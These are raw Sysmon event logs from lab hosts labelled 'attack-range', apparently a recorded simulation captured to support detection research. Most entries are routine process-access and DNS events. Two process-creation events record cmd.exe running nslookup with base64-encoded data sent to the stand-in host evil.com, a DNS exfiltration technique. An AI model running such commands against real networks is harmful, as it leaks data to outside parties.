14:16:40.684{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53008- 354300x8000000000000000203410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.683{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53007- 354300x8000000000000000203409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.535{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53006- 354300x8000000000000000203408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.535{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53005- 354300x8000000000000000203407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.534{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53004- 10341000x8000000000000000203406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.051{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.051{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.051{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.051{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.051{2E1864BB-17C9-629A-A441-000000005F02}80165584C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-A541-000000005F02}6388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.051{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-A541-000000005F02}6388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.051{2E1864BB-17C9-629A-A341-000000005F02}75641044C:\Windows\system32\cmd.exe{2E1864BB-17CA-629A-A541-000000005F02}6388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.056{2E1864BB-17CA-629A-A541-000000005F02}6388C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C9-629A-A341-000000005F02}7564C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrfpe.tmp 2>&1 10341000x8000000000000000203398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.030{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-A441-000000005F02}8016C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.014{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C9-629A-A441-000000005F02}8016C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.999{2E1864BB-17C9-629A-A441-000000005F02}80165584C:\Windows\system32\conhost.exe{2E1864BB-17C9-629A-A341-000000005F02}7564C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.983{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C9-629A-A441-000000005F02}8016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.983{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043953Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:42.640{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=698BC3108519110DF7893F625D2BE4F6,SHA256=22317B0AFBCE4B8CF3E441ABEA1991DF9FF0E1994C796DFD2E4C4A42203DE2ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.926{2E1864BB-17CB-629A-D441-000000005F02}7322036C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-D541-000000005F02}7848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.926{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.926{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.926{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.926{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.926{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-D541-000000005F02}7848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.926{2E1864BB-17CB-629A-D341-000000005F02}25207656C:\Windows\system32\cmd.exe{2E1864BB-17CB-629A-D541-000000005F02}7848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.931{2E1864BB-17CB-629A-D541-000000005F02}7848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CB-629A-D341-000000005F02}2520C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlszarhd.tmp 2>&1 10341000x8000000000000000203882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.910{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-D441-000000005F02}732C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.910{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-D441-000000005F02}732C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.895{2E1864BB-17CB-629A-D441-000000005F02}7322036C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-D341-000000005F02}2520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.863{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-D441-000000005F02}732C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.855{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.855{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.839{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.839{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 